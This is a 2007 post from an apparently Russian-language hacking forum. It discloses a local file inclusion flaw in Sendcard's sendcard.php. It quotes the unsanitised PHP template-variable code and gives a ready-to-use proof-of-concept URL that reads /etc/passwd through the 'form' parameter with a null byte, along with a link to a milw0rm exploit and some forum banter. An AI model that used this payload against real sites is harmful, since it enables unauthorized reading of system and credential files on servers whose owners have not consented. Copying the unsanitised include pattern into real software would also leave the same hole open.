29.06.2007, 12:44
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
Sendcard (sendcard.php) Sendcard Local File Inclusion Vulnerability
Bug:
PHP код:
"// Get the template details
if(!isset($form) || $form == ''){
$form = "form";
}
if(!isset($des) || $des == ''){
$des = "card";
}
if (!isset($template) || $template == '') {
$template = 'message';
}"
PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00
-et
перед тем как писать смотрите на первоисточник и на дату!
http://www.milw0rm.com/exploits/3827
>> 29.06.2007 10:54:09 ettee пишет:
>> "... и дауны,все это характерно для андеграунда" ^^
>> 29.06.2007 10:54:33 dark witch пишет:
>> оооо дауны....андеграуд...какие знакомые слова...
Последний раз редактировалось ettee; 29.06.2007 в 14:07..
|
|
|